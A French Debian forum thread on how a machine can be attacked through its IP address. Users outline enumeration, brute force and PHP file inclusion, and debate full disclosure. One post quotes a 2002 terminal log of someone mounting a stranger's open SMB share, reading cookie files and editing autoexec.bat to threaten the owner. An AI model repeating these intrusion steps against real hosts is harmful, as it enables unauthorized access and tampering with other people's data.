Comment peut-on être piraté avec une ip

Bonsoir.
Je me pose des questions sur les techiques des pirates. En effet, il semble que le grand danger, c’est que ceux-ci trouvent notre ip. Ceci dit, si le parefeu bloque tous les ports, à priori il n’y a pas d’attaque possible. Mais si on a les ports d’ouvert, comment ces derniers peuvent agir sur le pc cible, juste en ayant son ip. Que le pc cible soit sous windows ou linux, je ne vois pas comment cela est possible, car il faut être connecté sous un nom d’utilisateur pour agir sur le pc cible. Et pour se connecter via le net, il faut ssh par exemple, enfin il faut que le pc cible soit préparé à ça.
Bref, j’aimerais comprendre pour mieux me protéger, car à faire tourner des serveurs, on est obligé d’ouvrir des ports, mais les dangers sont présents, et j’aimerais comprendre comment se protéger?

tres interressante ta question

deja en premier je dirais ceci :

deja ssh il y faut fail2bann , il est tres recommander …

apres tu peux regarder sur : hackforums.net/ pour connairte les technique empluer ainsi que le forum de bactrack , il existe pas mal de choses sur la psychologie du hacking mais là , se sont des livres …

tu peux aussi poser cette meme question chez forums.thehackademy.net/ il y a des gens tres competant …

et pour les technique de hack et comment se proteger , n’hesite pas a faire des requettes googlesques… :wink: :wink: ya tout !!

Le problème de trouver ton IP, ça ce n’est pas compliqué.

Ben non ce n’est pas dur à trouver une ip, c’est bien pour ça que je trouve ça inquiétant…

Une fois que tu as l’IP, tu cherches une entrée sur la machine: un serveur, bref quelque chose qui répond à tes requêtes. Une fois que tu as ça, tu cherches à identifier très précisement le service et

  • soit à trouver un login/mot de passe pour entrer sur la machine dans le cas d’un service nécessitant une authentification. Cela peut se faire par force brute ou bien par recherche précise si tu vises un compte précis.
  • soit à trouver une faille permettant d’exécuter un code sur la machine dans le cas d’un service anonyme (script PHP (foorum, PHPMyadmin, etc), FTP anonyme, …). Cela nécessite la connaissance du programme à l’autre bout et l’utilisation de failles diverses.

Une fois que tu peux entrer dessus, tu peux essayer de gagner les droits root en utilisant une faille du noyau mais ça n’est pas simple.

Il est stupide de cacher ton IP puisque quand tu fais un serveur tu la donnes…

Je me doute bien que on ne peut pas cacher l’ip. C’était la suite qui m’intriguait, je voyais mal comment on pouvait accéder au systeme. Tes explications claires m’en disent déja plus. En fait, si faille il doit y avoir, ce sera dans le programme utilisant le port ouvert (serveur…). Déja, il faut que ce programme soit un programme permettant un login (accès à la machine) . Donc bon, on peut espérer que les mots de passes sont bien protégés (je ne peux pas espérer mieux).
Pour l’autre solution, il s’agirait du noyau linux. Là encore, je ne peux que espérer qu’il est bien fiable.

Bon, je susi un peu rassuré déja, ce n’est pas donné à tout le monde de faire un tel exploit, même si je ne doute pas que ce soit possible.
Donc bon, je vais me permettre de laisser mes serveurs quelque temps je pense.

auto-scan

$ nmap 127.0.0.1

et comparer

$ nmap IP_publique

youtube.com/watch?v=Aak6-B3JORE

Attention de ne pas trop vous étendre sur le sujet, jusqu’à donner les solutions pour faire.
Je sais parfaitement qu’on peut trouver les modes d’emploi un peu partout mais je préfère qu’on ne les trouve pas sur Debian-fr.

Pas vraiment d’accord sur ce point: donner une solution de piratage revient à donner une solution pour contrer ce piratage. Je suis vraiment pour la plus grande diffusion sur ces informations.

En tout cas c’est grâce à ce type de raisonnement que les logiciels libres sont sécurisés. Si tout le monde gardait les failles de sécu pour soi et l’exploit qui va avec on aurait pas les [SECURITY] [DSA 2096-1] New zope-ldapuserfolder packages fix authentication bypass qui font de debian ce qu’elle est.

@thuban : je ne sais pas si tu héberges des services http ni comment tu les sécurises mais quand tu vois la quantité de scanners de faille qui peuvent laisser des traces dans les logs tu te dis qu’une machine qui n’est pas administrée proprement est “relativement” facile à pirater. D’autre part un pirate ne cherche pas nécessairement à obtenir les droits root sur une machine. Détourner un service de son rôle initial peut-être suffisant. Je prends l’exemple d’un service SMTP, l’utiliser comme relais ouvert est une tentative récurrente.

La réponse en image, en réalité il n’y a rien de compliqué à pirater avec une ip comme le fait assez régulièrement Robin Dubois:

Je suis un “jeune trou du cul” (ce n’est qu’un hypothèse, malheureusement, pour ‘jeune’)
J’ai envie de faire chier le monde (rien d’illogique)
Je lis ce post sur debian-fr.org :

[code]Une fois que tu as l’IP, tu cherches une entrée sur la machine: un serveur, bref quelque chose qui répond à tes requêtes. Une fois que tu as ça, tu cherches à identifier très précisement le service et

  • soit à trouver un login/mot de passe pour entrer sur la machine dans le cas d’un service nécessitant une authentification. Cela peut se faire par force brute ou bien par recherche précise si tu vises un compte précis.
  • soit à trouver une faille permettant d’exécuter un code sur la machine dans le cas d’un service anonyme (script PHP (foorum, PHPMyadmin, etc), FTP anonyme, …). Cela nécessite la connaissance du programme à l’autre bout et l’utilisation de failles diverses.

Une fois que tu peux entrer dessus, tu peux essayer de gagner les droits root en utilisant une faille du noyau mais ça n’est pas simple.

Il est stupide de cacher ton IP puisque quand tu fais un serveur tu la donnes…[/code]
:115 :115 :115 Tiens le voilà le moyen pour emmerder un peu plus la société
Alors, voyons comment je vais commencer : Une IP, qui dit le vieux … vite, Google, je tape “comment connaître une IP” …

[code]auto-scan

$ nmap 127.0.0.1

et comparer

$ nmap IP_publique[/code]
Ah bon, c’est pas plus compliqué que ça, chouette !
Voyons la suite :017
Tiens, pas mal ce lien, y’a des explications et pi youtube, j’connais bien

http://www.youtube.com/watch?v=Aak6-B3JORE

Qu’est-ce qui raconte l’ot vieux con rabat-joie

Attention de ne pas trop vous étendre sur le sujet, jusqu'à donner les solutions pour faire. Je sais parfaitement qu'on peut trouver les modes d'emploi un peu partout mais je préfère qu'on ne les trouve pas sur Debian-fr.
Heureusement, le premier vieux con est plus sympa, il est d’ac pour donner la soluce :

Pas vraiment d'accord sur ce point: donner une solution de piratage revient à donner une solution pour contrer ce piratage. Je suis vraiment pour la plus grande diffusion sur ces informations.

Ah en v’la un ot qu’est sympa aussi, tiens, quand j’aurai trouvé leur IP, j’irai faire le test chez eux, pour voir si ça fonctionne bien.
Alors, y dit qui faut aller voir les logs, bon c’est quoi ça ?
Faut qu’jem’renseigne encore un peu avant d’essayer mais ça a l’air vraiment cool comme occupation entre deux caisses à brûler.

@thuban : je ne sais pas si tu héberges des services http ni comment tu les sécurises mais quand tu vois la quantité de scanners de faille qui peuvent laisser des traces dans les logs tu te dis qu'une machine qui n'est pas administrée proprement est "relativement" facile à pirater. D'autre part un pirate ne cherche pas nécessairement à obtenir les droits root sur une machine. Détourner un service de son rôle initial peut-être suffisant. Je prends l'exemple d'un service SMTP, l'utiliser comme relais ouvert est une tentative récurrente.

mais il n’y a pas de souci, cacher des renseignements n’a jamais été une solution pour la sécurité:Windows cache son système: pendant 3 ans, il suffisait de taper la première lettre du mot de passe pour que si elle corresponde au vrai mot de passe, la validation soit parfaite. Il a fallu quelques jours pour que le biais dans la génération des clefs d’openssh sur debian soit révélé et corrigé.

Il est indispensable que chacun sache qu’une recherche dans google de “index.php?url=” permet de trouver des scripts PHP prenant une url en argument et que si PHP est mal configuré, cela permet de charger un script personnel sur le serveur et de l’éxécuter en mettant une addresse derrière URL.

Par contre, il est stupide de croire que tout cela est simplissime et si l’usage de Kiddy script est très simple, le piratage d’une machine est compliqué et nécessite beaucoup plus de connaissances et d’expériences que celles qu’on pourrait fournir ici. Par exemple la video nécessite de capturer tout le traffic ethernet, cela n’est pas le cas avec les switchs, il faut être sur la passerelle, ou bien avoir fait basculer le switch en hub par saturation de la table, etc… Bref, je doute que ça soit utilisable simplement.

@ricardo en mode “détendu du dimanche après une soirée bien arrosée” : mettons donc en place un filtrage du net afin de ne délivrer les informations qu’aux personnes autorisées et identifiées :wink: .

Quand bien même quelqu’un donnerait ici le code source d’une exploitation, comme cela s’est déjà fait, l’effet serait bénéfique parce que pour un kiddie qui trouverait une idée malsaine on aurait plusieurs dizaines de membres qui seraient sensibilisés à la sécurité de leur machine.

pas mal en effet, ca se fait de plus sur certains forums , certaines categories ne sont plus en lecture seuls , mais ceux qui font cela c’est parceque c’est du lourd

exact !! et ceux qui veulent vraiment connaitre les principes de base n’ont qu’a lire les livres fait pour ça :

pearson.fr/recherche/?fa=rec … htext=hack , je les ai tous et sont tres bon !!

@Ricardo : le lien youtube n’est qu’un exemple parmi tant d’autres , mais si tu le souhaite tu peux retirer le lien :slight_smile: :slight_smile: avec les nouvelles lois sur les forums & blogs, faudrais pas que debian-fr soit dans le collimateur …

Tiens Ricardo, que comptes tu faire avec ça (Piratage d’une machine Italienne un peu inconsciente qui était vérolée et scannait les machines à tout va): Je te laisse devienr qui peux être inconnu et quelle est la machine.

[quote]inconnu@machine:~$ cat /var/log/syslog | grep smb | tail -n 10
Dec 14 09:46:12 machine smbd[21287]: connect from 203.144.73.39
Dec 14 09:56:52 machine smbd[23729]: connect from 202.22.47.106
Dec 14 09:59:36 machine smbd[24340]: connect from host217-40-63-49.in-addr.btopenworld.com
Dec 14 10:02:57 machine smbd[25128]: connect from adsl-65-65-175-234.dsl.hstntx.swbell.net
Dec 14 10:04:00 machine smbd[25365]: connect from 210.83.23.33
Dec 14 10:04:58 machine smbd[25590]: connect from 12.124.196.186
Dec 14 10:05:18 machine smbd[25666]: connect from 195.87.140.172
Dec 14 10:08:17 machine smbd[26358]: connect from 61.11.83.32
Dec 14 10:12:49 machine smbd[27418]: connect from ppp-11-207.30-151.libero.it
inconnu@machine:~$ su
Password:
machine:/home/inconnu# findsmb ppp-11-207.30-151.libero.it

                            *=DMB
                            +=LMB

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION -B ppp-11-207.30-151.libero.it

151.30.207.11 TSERVER [TECNOCASA]
machine:/home/inconnu# smbclient -L TSERVER -I 151.30.207.11
added interface ip=192.168.1.251 bcast=192.168.1.255 nmask=255.255.255.0
Password:

Sharename      Type      Comment
---------      ----      -------
RETE CHIESAN   Disk      
C              Disk      Disco Server Tecnocasa
IPC$           IPC       Comunicazioni remote tra processi

Server               Comment
---------            -------

Workgroup            Master
---------            -------

machine:/home/inconnu# mount //TSERVER/C /mnt -t smbfs -o username=standard,wor kgroup=TECNOCASA,ip=151.30.207.11
Password:
machine:/home/inconnu# cd /mnt
machine:/mnt# ls
Accwin config.sys IDAPI put.ini
AClient.cfg cpqapps institu RECYCLED
AClient.dat DETLOG.TXT INSWIN_OLD RESETLOG.TXT
ACQUISIK_OLD dmi io.sys RETE CHIESANUOVA
Agenda Chiesanuova.fp3 Documenti liprefs.js RICHWIN_OLD
autoexec.bat ffastun0.ffx logo.sys salvataggio
BDTCHIESANUOVA Ricuperato.FP3 ffastun.ffa MASTWIN_OLD SCANDISK.LOG
BOOTLOG.PRV ffastun.ffl MSDOS.— SYSTEM.SAV
BOOTLOG.TXT ffastun.ffo MSDOS.SYS T2000
command.com frunlog.txt NETLOG.TXT TISN
COMMWIN_OLD gay.ini PDOXUSRS.NET tmp.ini
Compaq iconbusq.ico Programmi windows
machine:/mnt# cd Windows/Cookies
machine:/mnt/Windows/Cookies# ls
anyuser@cgi-bin[1].txt
anyuser@giochi[1].txt
index.dat
p4@1it.cqcounter[1].txt
p4@207.38.1[1].txt
p4@212.110.12[1].txt
p4@212.177.107[1].txt
p4@24oreborsaonline.ilsole24ore[2].txt
p4@3com[2].txt
p4@64.40.110[2].txt
p4@about[1].txt
p4@accumail[1].txt
p4@ad1.dada[2].txt
[…]
p4@www.trampolino[1].txt
p4@www.tuttogratis[1].txt
p4@www.virtuagirl[1].txt
p4@xmts[1].txt
p4@yahoo[1].txt
p4@yahoo[2].txt
p4@yourmedia[1].txt
p4@zdnet[2].txt
machine:/mnt/Windows/Cookies# cat p4@www.multiplayer[1].txt
multiplayernetwork
212.216.81.103.131391028821721222
www.multiplayer.it/
0
2318520960
29580740
604829760
29507315
*
machine:/mnt/Windows/Cookies# cd /mnt
machine:/mnt# cat autoexec.bat
@echo OFF

SET PATH=%PATH%;c:\DMI\WIN32\BIN

SET WIN32DMIPATH=c:\dmi\win32
machine:/mnt# vi autoexec.bat
machine:/mnt# cat autoexec.bat
@echo OFF
echo "Ca n’est pas bien de scanner les machines des autres"
echo "la prochaine fois, j’ecrase ton disque dur"
echo "OK, Au revoir"
SET PATH=%PATH%;c:\DMI\WIN32\BIN

SET WIN32DMIPATH=c:\dmi\win32
machine:/mnt# cd
machine:~# umount /mnt
machine:~# exit
inconnu@machine:~$
Script done on Sat Dec 14 10:20:23 2002
[/quote]

No comment !
Moi, j’ai tenu mon rôle en mettant en garde, mais,
je ne me sens plus concerné puisqu’un autre administrateur en prend la responsabilité.
Si problème il y a, c’est lui qui ira en tôle :mrgreen: :mrgreen: :mrgreen:
Allez, chui pas vache, j’organiserai une collecte pour t’apporter des oranges :smiling_imp:

Tu sous entend que tu connais «inconnu» on dirait…

Plus sérieusement, on peut regarder ce qui est décrit: on a

  1. recherche des services Netbios de la machine ppp-11-207.30-151.libero.it
    On constate que son petit non est TSERVER et son groupe est TECNOCASA
    Elle partage le disque C
  2. Montage du disque C. Aucun mot de passe n’est demandé, l’utilisateur «standard» peut monter le disque.
  3. Petite balade sur le disque: on peut accéder à tout le disque
  4. Modification du fichier autoexec.bat de telle manière que le gars ait un avertissement au prochain démarrage de sa machine.

Bilan: C’est une machine calamiteuse qui partageait son disque avec le monde entier, diffuser cette information n’apprend rien à personne (regarde chaque commande, tu les connaissais déjà). Par contre cela montre aux possesseurs de machines windows l’importance de filtrer les ports netbios (137->139) et de mettre des mots de passe.

Censurer cet exemple n’a aucun intérêt. En clair Ed ne risque vraiment rien ici, et éthiquement ou moralement, il n’a rien à se reprocher. Par contre «inconnu» pourrait être inquieté si il était indentifiable, mais là on se demande vraiment qui c’est :slightly_smiling:

Tu sais comme moi, et comme une grande partie des membres de ce forum qu’en effet, tant que l’on ne donne que des exemples de cette trempe, il n’y a aucun risque.
Tu sais néanmoins aussi qu’il n’y a pas que la “grande partie des membres” dans ce forum, il y a aussi une partie, que je souhaite le plus infime possible, de trouducs, qui ne demandent qu’à obtenir des conseils … dans une optique mal intentionnés.
Fait l’essai d’alimenter ce fil et tu verras qu’on va finir par obtenir un wagon de liens nous indiquant comment pirater un pov type qui n’aura pas su se protéger.
Bien sûr qu’on ne risquera rien légalement, mais moralement, je préfère ne pas participer.
Par contre, un fil ouvert avec toutes les ficelles pour éviter ce piratage, alors là, je dirais bravo !